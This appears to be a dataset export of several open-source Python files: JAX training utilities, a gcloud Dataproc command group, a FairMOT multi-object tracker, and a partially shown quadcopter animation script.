hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a1599c7d689bdb23980abc965d7263008352328
| 3,443
|
py
|
Python
|
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | 1
|
2021-02-15T04:50:04.000Z
|
2021-02-15T04:50:04.000Z
|
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | null | null | null |
nfnets/utils.py
|
bruinxiong/deepmind-research
|
4899440e3eb2dee9335c469c7f01aadcbf21cc72
|
[
"Apache-2.0"
] | 1
|
2021-05-20T15:43:47.000Z
|
2021-05-20T15:43:47.000Z
|
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils."""
import jax
import jax.numpy as jnp
import tree
def reduce_fn(x, mode):
"""Reduce fn for various losses."""
if mode == 'none' or mode is None:
return jnp.asarray(x)
elif mode == 'sum':
return jnp.sum(x)
elif mode == 'mean':
return jnp.mean(x)
else:
raise ValueError('Unsupported reduction option.')
def softmax_cross_entropy(logits, labels, reduction='sum'):
  """Computes softmax cross entropy given logits and one-hot class labels.

  Args:
    logits: Logit output values.
    labels: Ground truth one-hot-encoded labels.
    reduction: Type of reduction to apply to loss ('none'/None, 'sum', 'mean').

  Returns:
    Loss value. If `reduction` is `none`, this has the same shape as `labels`
    minus the final axis; otherwise, it is scalar.

  Raises:
    ValueError: If the type of `reduction` is unsupported.
  """
  log_probs = jax.nn.log_softmax(logits)
  # Cross entropy per example: negative log-likelihood of the true class.
  per_example_loss = -(labels * log_probs).sum(axis=-1)
  return reduce_fn(per_example_loss, reduction)
def topk_correct(logits, labels, mask=None, prefix='', topk=(1, 5)):
  """Calculate top-k accuracy indicators for each k in `topk`.

  Args:
    logits: per-class scores; argsort is ascending, so the last k entries
      along the final axis are the k highest-scoring classes.
    labels: ground-truth labels, compared against the top-k predictions.
    mask: optional per-example weight multiplied into the indicators.
    prefix: string prepended to each metric name.
    topk: iterable of k values to evaluate.

  Returns:
    Dict mapping '{prefix}top_{k}_acc' to per-example correctness floats.
  """
  ranked = jnp.argsort(logits)
  metrics = {}
  for k in topk:
    topk_preds = ranked[..., -k:]
    # Example counts as correct if the label appears among the k predictions.
    hits = any_in(topk_preds, labels).any(axis=-1).astype(jnp.float32)
    if mask is not None:
      hits = hits * mask
    metrics[f'{prefix}top_{k}_acc'] = hits
  return metrics
@jax.vmap
def any_in(prediction, target):
  """For each row in a and b, checks if any element of a is in b.

  Vectorized over the leading (batch) axis by jax.vmap; per example, returns
  a boolean mask shaped like `prediction` marking which of its elements occur
  in `target` (jnp.isin semantics).
  """
  return jnp.isin(prediction, target)
def tf1_ema(ema_value, current_value, decay, step):
  """EMA update with TF1-style decay warmup.

  Early in training the effective decay is capped at (1 + step) / (10 + step),
  so the average adapts quickly before settling at `decay`.
  """
  warmup_cap = (1.0 + step) / (10.0 + step)
  effective_decay = jnp.minimum(decay, warmup_cap)
  return effective_decay * ema_value + (1 - effective_decay) * current_value
def ema(ema_value, current_value, decay, step):
  """Plain EMA update without warmup.

  `step` is accepted only for signature parity with `tf1_ema` and ignored.
  """
  del step  # Unused.
  return decay * ema_value + (1 - decay) * current_value
# PEP 8 (E731): named lambdas are better written as defs — same call
# interface, but with a real __name__ and docstring for tracebacks.
def to_bf16(x):
  """Cast float32 arrays to bfloat16; any other dtype passes through."""
  return x.astype(jnp.bfloat16) if x.dtype == jnp.float32 else x


def from_bf16(x):
  """Inverse of `to_bf16`: cast bfloat16 arrays back to float32."""
  return x.astype(jnp.float32) if x.dtype == jnp.bfloat16 else x
def _replicate(x, devices=None):
"""Replicate an object on each device."""
x = jax.numpy.array(x)
if devices is None:
devices = jax.local_devices()
return jax.api.device_put_sharded(len(devices) * [x], devices)
def broadcast(obj):
  """Broadcasts an object to all local devices.

  None and booleans are returned unchanged (treated as flags rather than
  data to replicate); everything else is sharded via `_replicate`.
  """
  if obj is None or isinstance(obj, bool):
    return obj
  return _replicate(obj)
def split_tree(tuple_tree, base_tree, n):
  """Splits tuple_tree with n-tuple leaves into n trees.

  Each output tree has base_tree's structure with leaf i taken from the
  corresponding tuple leaf of tuple_tree.
  """
  split = []
  for i in range(n):
    # Bind the loop index as a default argument so each lambda captures its
    # own value (avoids the late-binding-closure pitfall and the pylint
    # cell-var-from-loop suppression).
    picker = lambda leaf, idx=i: leaf[idx]
    split.append(tree.map_structure_up_to(base_tree, picker, tuple_tree))
  return split
| 31.87963
| 111
| 0.683706
|
4a1599c9df8991429c3206b0cb723f6a2d475331
| 1,171
|
py
|
Python
|
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | 1
|
2017-11-29T18:52:27.000Z
|
2017-11-29T18:52:27.000Z
|
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | null | null | null |
google-cloud-sdk/lib/surface/dataproc/operations/__init__.py
|
bopopescu/searchparty
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
[
"Apache-2.0"
] | 3
|
2017-07-27T18:44:13.000Z
|
2020-07-25T17:48:53.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud dataproc operations."""
from googlecloudsdk.calliope import base
# NOTE: calliope renders this class docstring as the `gcloud` help text for
# the command group, so its wording is user-facing.
class Operations(base.Group):
  """View and manage Google Cloud Dataproc operations.

  View and manage Google Cloud Dataproc operations.

  ## EXAMPLES

  To cancel an active operation, run:

    $ {command} cancel operation_id

  To view the details of an operation, run:

    $ {command} describe operation_id

  To see the list of all operations, run:

    $ {command} list

  To delete the record of an inactive operation, run:

    $ {command} delete operation_id
  """
| 27.232558
| 74
| 0.740393
|
4a1599da7bd38d6aeab01b9d322691d80b5c212a
| 17,674
|
py
|
Python
|
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | 3
|
2021-09-19T13:49:46.000Z
|
2021-12-13T12:41:29.000Z
|
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | null | null | null |
Software/MOTsc/TrackingKernel/tracker.py
|
liu-mengyang/MOTinAR
|
209412346841f2ac69b0e38a3502c9c728309752
|
[
"MIT"
] | null | null | null |
import numpy as np
from numba import jit
from collections import deque
import itertools
import os
import os.path as osp
import time
import torch
import cv2
import csv
import torch.nn.functional as F
import ctypes
from .build_model import build_fairmot, load_model
from .fairmot.models.decode import mot_decode
from .fairmot.models.utils import _tranpose_and_gather_feat
from .fairmot.tracking_utils.utils import *
from .fairmot.tracking_utils.log import logger
from .fairmot.tracking_utils.kalman_filter import KalmanFilter
from .fairmot.tracker import matching
from .fairmot.tracker.basetrack import BaseTrack, TrackState
from .fairmot.utils.post_process import ctdet_post_process
from .fairmot.utils.image import get_affine_transform
class STrack(BaseTrack):
    """One tracked target: a Kalman-filtered bounding box plus an
    EMA-smoothed appearance embedding used for re-identification."""
    shared_kalman = KalmanFilter()

    def __init__(self, tlwh, score, temp_feat, buffer_size=30):
        """Create a new (not yet activated) track from a detection.

        Args:
            tlwh: box as (top-left x, top-left y, width, height).
            score: detection confidence.
            temp_feat: appearance embedding of the detection.
            buffer_size: capacity of the recent-feature deque.
        """
        # wait activate
        # NOTE: `np.float` (an alias of the builtin) was removed in
        # NumPy >= 1.24; the builtin `float` is the documented replacement.
        self._tlwh = np.asarray(tlwh, dtype=float)
        self.kalman_filter = None
        self.mean, self.covariance = None, None
        self.is_activated = False

        self.score = score
        self.tracklet_len = 0

        self.smooth_feat = None
        # Create the per-instance buffer and EMA weight *before* calling
        # update_features(): the previous ordering made the first call append
        # to a list attribute inherited from BaseTrack, which is shared by
        # every track instance (a cross-instance feature leak).
        self.features = deque([], maxlen=buffer_size)
        self.alpha = 0.9
        self.update_features(temp_feat)

    def update_features(self, feat):
        """L2-normalise `feat`, fold it into the EMA feature, and buffer it."""
        feat /= np.linalg.norm(feat)
        self.curr_feat = feat
        if self.smooth_feat is None:
            self.smooth_feat = feat
        else:
            self.smooth_feat = self.alpha * self.smooth_feat + (1 - self.alpha) * feat
        self.features.append(feat)
        # Re-normalise so the smoothed feature stays unit length.
        self.smooth_feat /= np.linalg.norm(self.smooth_feat)

    def predict(self):
        """Advance this track's Kalman state by one frame."""
        mean_state = self.mean.copy()
        if self.state != TrackState.Tracked:
            # Zero the height velocity component so non-tracked states do not
            # drift in scale while unobserved.
            mean_state[7] = 0
        self.mean, self.covariance = self.kalman_filter.predict(mean_state, self.covariance)

    @staticmethod
    def multi_predict(stracks):
        """Vectorised Kalman predict over a list of tracks (updates in place)."""
        if len(stracks) > 0:
            multi_mean = np.asarray([st.mean.copy() for st in stracks])
            multi_covariance = np.asarray([st.covariance for st in stracks])
            for i, st in enumerate(stracks):
                if st.state != TrackState.Tracked:
                    multi_mean[i][7] = 0
            multi_mean, multi_covariance = STrack.shared_kalman.multi_predict(multi_mean, multi_covariance)
            for i, (mean, cov) in enumerate(zip(multi_mean, multi_covariance)):
                stracks[i].mean = mean
                stracks[i].covariance = cov

    def activate(self, kalman_filter, frame_id, next_id):
        """Start a new tracklet."""
        self.kalman_filter = kalman_filter
        self.track_id = next_id
        self.mean, self.covariance = self.kalman_filter.initiate(self.tlwh_to_xyah(self._tlwh))

        self.tracklet_len = 0
        self.state = TrackState.Tracked
        # Only tracks born on the very first frame are trusted immediately;
        # later ones stay unconfirmed until matched again.
        if frame_id == 1:
            self.is_activated = True
        self.frame_id = frame_id
        self.start_frame = frame_id

    def re_activate(self, new_track, frame_id):
        """Revive a lost track with a freshly matched detection."""
        self.mean, self.covariance = self.kalman_filter.update(
            self.mean, self.covariance, self.tlwh_to_xyah(new_track.tlwh)
        )
        self.update_features(new_track.curr_feat)
        self.tracklet_len = 0
        self.state = TrackState.Tracked
        self.is_activated = True
        self.frame_id = frame_id

    def update(self, new_track, frame_id, update_feature=True):
        """
        Update a matched track
        :type new_track: STrack
        :type frame_id: int
        :type update_feature: bool
        :return:
        """
        self.frame_id = frame_id
        self.tracklet_len += 1

        new_tlwh = new_track.tlwh
        self.mean, self.covariance = self.kalman_filter.update(
            self.mean, self.covariance, self.tlwh_to_xyah(new_tlwh))
        self.state = TrackState.Tracked
        self.is_activated = True

        self.score = new_track.score
        if update_feature:
            self.update_features(new_track.curr_feat)

    @property
    # @jit(nopython=True)
    def tlwh(self):
        """Get current position in bounding box format `(top left x, top left y,
        width, height)`.
        """
        if self.mean is None:
            return self._tlwh.copy()
        # Kalman state stores (center x, center y, aspect ratio, height, ...).
        ret = self.mean[:4].copy()
        ret[2] *= ret[3]
        ret[:2] -= ret[2:] / 2
        return ret

    @property
    # @jit(nopython=True)
    def tlbr(self):
        """Convert bounding box to format `(min x, min y, max x, max y)`, i.e.,
        `(top left, bottom right)`.
        """
        ret = self.tlwh.copy()
        ret[2:] += ret[:2]
        return ret

    @staticmethod
    # @jit(nopython=True)
    def tlwh_to_xyah(tlwh):
        """Convert bounding box to format `(center x, center y, aspect ratio,
        height)`, where the aspect ratio is `width / height`.
        """
        ret = np.asarray(tlwh).copy()
        ret[:2] += ret[2:] / 2
        ret[2] /= ret[3]
        return ret

    def to_xyah(self):
        """This track's current box in (cx, cy, aspect, h) form."""
        return self.tlwh_to_xyah(self.tlwh)

    @staticmethod
    # @jit(nopython=True)
    def tlbr_to_tlwh(tlbr):
        """Convert (x1, y1, x2, y2) to (x, y, w, h)."""
        ret = np.asarray(tlbr).copy()
        ret[2:] -= ret[:2]
        return ret

    @staticmethod
    # @jit(nopython=True)
    def tlwh_to_tlbr(tlwh):
        """Convert (x, y, w, h) to (x1, y1, x2, y2)."""
        ret = np.asarray(tlwh).copy()
        ret[2:] += ret[:2]
        return ret

    def __repr__(self):
        return 'OT_{}_({}-{})'.format(self.track_id, self.start_frame, self.end_frame)
class FairTracker(object):
    """FairMOT multi-object tracker.

    Runs the FairMOT detection + re-ID network on each frame and associates
    detections to existing tracks in two stages: appearance-embedding match
    (fused with Kalman motion gating), then IoU match. Keeps per-frame timing
    and count statistics in the *_lst attributes for later analysis.
    """
    def __init__(self, opt, frame_rate=30):
        # opt: options namespace (model path, thresholds, gpus, normalization
        # constants, ...) — schema defined by the caller; TODO confirm fields.
        self.opt = opt
        if opt.gpus[0] >= 0:
            opt.device = torch.device('cuda')
        else:
            opt.device = torch.device('cpu')
        print('Creating model...')
        self.model = build_fairmot()
        self.model = load_model(self.model, opt.load_model)
        self.model = self.model.to(opt.device)
        self.model.eval()

        # Active / temporarily-lost / permanently-removed track pools.
        self.tracked_stracks = []  # type: list[STrack]
        self.lost_stracks = []  # type: list[STrack]
        self.removed_stracks = []  # type: list[STrack]

        self.frame_id = 0
        # Next track id to hand out (ids are per-tracker, monotonically rising).
        self.next_id = 1
        self.det_thresh = opt.conf_thres
        # Lost tracks are dropped after this many frames without a match.
        self.buffer_size = int(frame_rate / 30.0 * opt.track_buffer)
        self.max_time_lost = self.buffer_size
        self.max_per_image = opt.K
        self.mean = np.array(opt.mean, dtype=np.float32).reshape(1, 1, 3)
        self.std = np.array(opt.std, dtype=np.float32).reshape(1, 1, 3)

        self.kalman_filter = KalmanFilter()

        # Per-frame diagnostics.
        self.pret_lst = [] # Load Input Time per frame
        self.infert_lst = [] # Model Infer Time per frame
        self.trkt_lst = [] # Update Track per frame
        self.detsnum_lst = [] # Detection Number per frame
        self.trknum_lst = [] # Tracking Number per frame

    def post_process(self, dets, meta):
        """Map raw network detections back to input-image coordinates.

        Returns a dict {class_id: Nx5 float32 array} (box coords + score,
        per ctdet_post_process).
        """
        dets = dets.detach().cpu().numpy()
        dets = dets.reshape(1, -1, dets.shape[2])
        dets = ctdet_post_process(
            dets.copy(), [meta['c']], [meta['s']],
            meta['out_height'], meta['out_width'], self.opt.num_classes)
        for j in range(1, self.opt.num_classes + 1):
            dets[0][j] = np.array(dets[0][j], dtype=np.float32).reshape(-1, 5)
        return dets[0]

    def merge_outputs(self, detections):
        """Concatenate per-image detection dicts, keeping at most
        `self.max_per_image` highest-scoring boxes across all classes."""
        results = {}
        for j in range(1, self.opt.num_classes + 1):
            results[j] = np.concatenate(
                [detection[j] for detection in detections], axis=0).astype(np.float32)

        scores = np.hstack(
            [results[j][:, 4] for j in range(1, self.opt.num_classes + 1)])
        if len(scores) > self.max_per_image:
            # Score threshold = the (len-K)-th smallest score, so exactly the
            # top-K (plus ties) survive.
            kth = len(scores) - self.max_per_image
            thresh = np.partition(scores, kth)[kth]
            for j in range(1, self.opt.num_classes + 1):
                keep_inds = (results[j][:, 4] >= thresh)
                results[j] = results[j][keep_inds]
        return results

    def find_trk(self, trk_id):
        """Return (index, track) of the active track with id `trk_id`,
        or (None, None) if absent."""
        for t,trk in enumerate(self.tracked_stracks):
            if trk.track_id == trk_id:
                return t, trk
        return None, None

    def update(self, im_blob, image_size, dense_region0=None):
        """Run one full tracking step on a preprocessed frame.

        Args:
            im_blob: network-ready image tensor.
            image_size: (height, width) of the original frame.
            dense_region0: optional (x, y) origin of a cropped region —
                detections are shifted by it back into full-frame coordinates
                (assumed; TODO confirm against caller).

        Returns:
            List of activated STrack objects for this frame.
        """
        #### ********* ####
        self.frame_id += 1
        activated_starcks = []
        refind_stracks = []
        lost_stracks = []
        removed_stracks = []

        height = image_size[0]
        width = image_size[1]
        # Fixed network input resolution.
        inp_height = 608
        inp_width = 1088

        c = np.array([width / 2., height / 2.], dtype=np.float32)
        s = max(float(inp_width) / float(inp_height) * height, width) * 1.0
        meta = {'c': c, 's': s,
                'out_height': inp_height // self.opt.down_ratio,
                'out_width': inp_width // self.opt.down_ratio}

        infer_st = time.time()
        ''' Step 1: Network forward, get detections & embeddings'''
        with torch.no_grad():
            output = self.model(im_blob)[-1]
            hm = output['hm'].sigmoid_()
            wh = output['wh']
            id_feature = output['id']
            id_feature = F.normalize(id_feature, dim=1)

            reg = output['reg'] if self.opt.reg_offset else None
            dets, inds = mot_decode(hm, wh, reg=reg, ltrb=self.opt.ltrb, K=self.opt.K)
            id_feature = _tranpose_and_gather_feat(id_feature, inds)
            id_feature = id_feature.squeeze(0)
            id_feature = id_feature.cpu().numpy()
        infer_et = time.time()
        self.infert_lst.append(infer_et-infer_st)

        trk_st = time.time()
        dets = self.post_process(dets, meta)
        # Single-class tracking: keep class 1 only.
        dets = self.merge_outputs([dets])[1]

        remain_inds = dets[:, 4] > self.opt.conf_thres
        dets = dets[remain_inds]
        id_feature = id_feature[remain_inds]
        self.detsnum_lst.append(len(dets))

        # Shift boxes from crop-local to full-frame coordinates.
        if dense_region0 is not None:
            for det in dets:
                det[0] += dense_region0[0]
                det[1] += dense_region0[1]
                det[2] += dense_region0[0]
                det[3] += dense_region0[1]

        if len(dets) > 0:
            '''Detections'''
            detections = [STrack(STrack.tlbr_to_tlwh(tlbrs[:4]), tlbrs[4], f, 30) for
                          (tlbrs, f) in zip(dets[:, :5], id_feature)]
        else:
            detections = []

        ''' Add newly detected tracklets to tracked_stracks'''
        self.trknum_lst.append(len(self.tracked_stracks) + len(self.lost_stracks))
        unconfirmed = []
        tracked_stracks = []  # type: list[STrack]
        for track in self.tracked_stracks:
            if not track.is_activated:
                unconfirmed.append(track)
            else:
                tracked_stracks.append(track)

        ''' Step 2: First association, with embedding'''
        strack_pool = joint_stracks(tracked_stracks, self.lost_stracks)
        # Predict the current location with KF
        STrack.multi_predict(strack_pool)
        dists = matching.embedding_distance(strack_pool, detections)
        dists = matching.fuse_motion(self.kalman_filter, dists, strack_pool, detections)
        matches, u_track, u_detection = matching.linear_assignment(dists, thresh=0.4)

        for itracked, idet in matches:
            track = strack_pool[itracked]
            det = detections[idet]
            if track.state == TrackState.Tracked:
                track.update(detections[idet], self.frame_id)
                activated_starcks.append(track)
            else:
                # Matched a lost track: revive it.
                track.re_activate(det, self.frame_id)
                refind_stracks.append(track)

        ''' Step 3: Second association, with IOU'''
        # Remaining detections vs. remaining *tracked* tracks only.
        detections = [detections[i] for i in u_detection]
        r_tracked_stracks = [strack_pool[i] for i in u_track if strack_pool[i].state == TrackState.Tracked]
        dists = matching.iou_distance(r_tracked_stracks, detections)
        matches, u_track, u_detection = matching.linear_assignment(dists, thresh=0.5)

        for itracked, idet in matches:
            track = r_tracked_stracks[itracked]
            det = detections[idet]
            if track.state == TrackState.Tracked:
                track.update(det, self.frame_id)
                activated_starcks.append(track)
            else:
                track.re_activate(det, self.frame_id)
                refind_stracks.append(track)

        # Tracks that survived both association rounds unmatched become lost.
        for it in u_track:
            track = r_tracked_stracks[it]
            if not track.state == TrackState.Lost:
                track.mark_lost()
                lost_stracks.append(track)

        '''Deal with unconfirmed tracks, usually tracks with only one beginning frame'''
        detections = [detections[i] for i in u_detection]
        dists = matching.iou_distance(unconfirmed, detections)
        matches, u_unconfirmed, u_detection = matching.linear_assignment(dists, thresh=0.7)
        for itracked, idet in matches:
            unconfirmed[itracked].update(detections[idet], self.frame_id)
            activated_starcks.append(unconfirmed[itracked])
        for it in u_unconfirmed:
            # Unconfirmed and unmatched: discard immediately.
            track = unconfirmed[it]
            track.mark_removed()
            removed_stracks.append(track)

        """ Step 4: Init new stracks"""
        for inew in u_detection:
            track = detections[inew]
            if track.score < self.det_thresh:
                continue
            track.activate(self.kalman_filter, self.frame_id, self.next_id)
            self.next_id += 1
            activated_starcks.append(track)

        """ Step 5: Update state"""
        # Expire lost tracks that have been unmatched for too long.
        for track in self.lost_stracks:
            if self.frame_id - track.end_frame > self.max_time_lost:
                track.mark_removed()
                removed_stracks.append(track)

        # Rebuild the three pools, keeping them disjoint.
        self.tracked_stracks = [t for t in self.tracked_stracks if t.state == TrackState.Tracked]
        self.tracked_stracks = joint_stracks(self.tracked_stracks, activated_starcks)
        self.tracked_stracks = joint_stracks(self.tracked_stracks, refind_stracks)
        self.lost_stracks = sub_stracks(self.lost_stracks, self.tracked_stracks)
        self.lost_stracks.extend(lost_stracks)
        self.lost_stracks = sub_stracks(self.lost_stracks, self.removed_stracks)
        self.removed_stracks.extend(removed_stracks)
        self.tracked_stracks, self.lost_stracks = remove_duplicate_stracks(self.tracked_stracks, self.lost_stracks)
        # get scores of lost tracks
        output_stracks = [track for track in self.tracked_stracks if track.is_activated]
        trk_et = time.time()
        self.trkt_lst.append(trk_et-trk_st)

        return output_stracks

    def infer(self, im_blob, image_size):
        """Detection-only pass: run the network and return raw STrack
        detections without any association.

        NOTE: duplicates the preprocessing/forward logic of update() and also
        increments self.frame_id, so interleaving infer() with update() skews
        frame counting.
        """
        #### ********* ####
        self.frame_id += 1
        activated_starcks = []
        refind_stracks = []
        lost_stracks = []
        removed_stracks = []

        height = image_size[0]
        width = image_size[1]
        inp_height = 608
        inp_width = 1088

        c = np.array([width / 2., height / 2.], dtype=np.float32)
        s = max(float(inp_width) / float(inp_height) * height, width) * 1.0
        meta = {'c': c, 's': s,
                'out_height': inp_height // self.opt.down_ratio,
                'out_width': inp_width // self.opt.down_ratio}

        infer_st = time.time()
        ''' Step 1: Network forward, get detections & embeddings'''
        with torch.no_grad():
            output = self.model(im_blob)[-1]
            hm = output['hm'].sigmoid_()
            wh = output['wh']
            id_feature = output['id']
            id_feature = F.normalize(id_feature, dim=1)

            reg = output['reg'] if self.opt.reg_offset else None
            dets, inds = mot_decode(hm, wh, reg=reg, ltrb=self.opt.ltrb, K=self.opt.K)
            id_feature = _tranpose_and_gather_feat(id_feature, inds)
            id_feature = id_feature.squeeze(0)
            id_feature = id_feature.cpu().numpy()
        infer_et = time.time()
        self.infert_lst.append(infer_et-infer_st)

        trk_st = time.time()
        dets = self.post_process(dets, meta)
        dets = self.merge_outputs([dets])[1]

        remain_inds = dets[:, 4] > self.opt.conf_thres
        dets = dets[remain_inds]
        id_feature = id_feature[remain_inds]
        self.detsnum_lst.append(len(dets))

        if len(dets) > 0:
            '''Detections'''
            detections = [STrack(STrack.tlbr_to_tlwh(tlbrs[:4]), tlbrs[4], f, 30) for
                          (tlbrs, f) in zip(dets[:, :5], id_feature)]
        else:
            detections = []
        return detections
def joint_stracks(tlista, tlistb):
    """Union of two track lists, keyed by track_id.

    Keeps every element of tlista (in order), then appends elements of
    tlistb whose track_id was not already seen.
    """
    seen_ids = {t.track_id for t in tlista}
    merged = list(tlista)
    for trk in tlistb:
        if trk.track_id not in seen_ids:
            seen_ids.add(trk.track_id)
            merged.append(trk)
    return merged
def sub_stracks(tlista, tlistb):
    """Tracks of tlista whose track_id does not occur in tlistb.

    Mirrors the original dict-based implementation: duplicate ids within
    tlista collapse to the last occurrence.
    """
    keep = {t.track_id: t for t in tlista}
    for trk in tlistb:
        keep.pop(trk.track_id, None)
    return list(keep.values())
def remove_duplicate_stracks(stracksa, stracksb):
    """For every cross-list pair with IoU distance < 0.15, drop the younger
    track (shorter lifetime) and keep the older one. Returns filtered copies
    of both lists."""
    pdist = matching.iou_distance(stracksa, stracksb)
    dup_a, dup_b = set(), set()
    for p, q in zip(*np.where(pdist < 0.15)):
        age_a = stracksa[p].frame_id - stracksa[p].start_frame
        age_b = stracksb[q].frame_id - stracksb[q].start_frame
        if age_a > age_b:
            dup_b.add(q)
        else:
            dup_a.add(p)
    resa = [t for i, t in enumerate(stracksa) if i not in dup_a]
    resb = [t for i, t in enumerate(stracksb) if i not in dup_b]
    return resa, resb
| 36.441237
| 115
| 0.59596
|
4a1599e6ba4dc1e64fcf7d970ba0ace1bfd128c6
| 7,027
|
py
|
Python
|
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
plotting.py
|
LiveActionCactus/quadcopter_simulation_python
|
f457835b4de4c418323dc8be1b21f52d05ef3e07
|
[
"MIT"
] | null | null | null |
# Creates and visual animation of quadcopter state information
#
# By: Patrick Ledzian
# Date: 18 Apr 2020
"""
Creates and plays an animation of a 13-state quadcopter simulation. Works along with the quadcopter class descriptor
found in quadcopter.py.
"""
# External Libraries
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import time
# Project Libraries
import quadcopter
# TODO: set the plotting sample rate in code, need to think about this a bit (falls in category with pos/att asynchronicity)
# TODO: maybe have this class inherit from Quadcopter() to get it's properties, is that necessary? Currently using Quadcopter() static methods
# TODO: do I need a quaternion class to encapsulate it's functionality? (maybe when I add the non-linear controller?) could have a bunch of static methods
# TODO: add pre-plotting of waypoints
# TODO: add trajectory ghost line to track in gray (see how close we get), have error metric plotting (maybe as part of analysis class?)
# TODO: allow the QuadPlot class to plot multiple vehicles at once
# TODO: link the plotting functionality to the Quacopter class in some way, better for multi-agent animations
# TODO: save animation to file, put on GitHub home
class QuadPlot:
    """
    Class descriptor of a quadcopter animation object. Allows for animation of historical quadcopter state information.
    """
    def __init__(self, sim_state_data):
        """
        Class constructor
        :param sim_state_data: 13xN array of state information (will become Qx13xN for multi-vehicle case)
        """
        # Accept either 13xN or Nx13 and normalize to 13xN.
        if str(np.shape(sim_state_data)[0]) == "13":
            pass
        elif str(np.shape(sim_state_data)[1]) == "13":
            sim_state_data = np.transpose(sim_state_data)
        else:
            raise Exception("The dimensions of the input data is incorrect, check and try again")

        # Downsample every 8th state sample for plotting speed.
        sim_state_data = sim_state_data[:, ::8]       # TODO: handle the downsampling in the main.py file, it's a simulation spec

        # initialize the 3-D animation/plotting structure
        fig = plt.figure()
        ax = p3.Axes3D(fig)
        # data is 1x3xN: (x, y, z) position rows extracted from the state.
        data = np.array([[sim_state_data[0, :], sim_state_data[1, :], sim_state_data[2, :]]])

        # declare line objects; update_quad() later retrieves these in order
        # via ax.get_lines(), so creation order matters.
        ax.plot([], [], [], '-', c='darkred')[0]                                    # quad arm
        ax.plot([], [], [], '-', c='midnightblue')[0]                               # quad arm
        ax.plot([], [], [], '-', c='darkgrey', marker='o', markersize=1, markevery=3)[0]   # quad center
        ax.plot([], [], [], '.', c='red', markersize=1)[0]                          # waypoints
        ax.plot([], [], [], '.', c='gold', markersize=2)[0]                         # trailing line
        ax.view_init(elev=30.0, azim=285)
        ax.dist = 12.0

        self._q1_pos_obj = [ax.plot(dat[0:1, 0], dat[0:1, 1], dat[0:1, 2])[0] for dat in data]      # create quadcopter "lines" plotting objects
        self.set_limits(1.0, 1.0, 3.0)

        # save some information as properties for later use
        self._fig = fig
        self._pos_data = data
        self._full_state = sim_state_data

    def plot_quad_3d(self):
        """
        Main plotting function, makes the FuncAnimation call that runs the animation using the update_quad() callback function.
        :return:
        """
        # NOTE(review): `t` is never used afterwards; presumably left over
        # from timing experiments.
        t = time.time()
        # Keeping the FuncAnimation in a local binds it for the lifetime of
        # plt.show(), preventing it from being garbage-collected mid-animation.
        ani = animation.FuncAnimation(self._fig, self.update_quad, np.shape(self._pos_data)[2],
                                      fargs=(self._pos_data, self._q1_pos_obj),
                                      interval=1, blit=False, repeat=False)
        plt.show()

    #
    # Animation helper functions
    #
    def set_limits(self, x, y, z):
        """
        Set initial figure boundaries in __init__(), labels the figure axes and title
        :param x: (> 0) maximum x bound
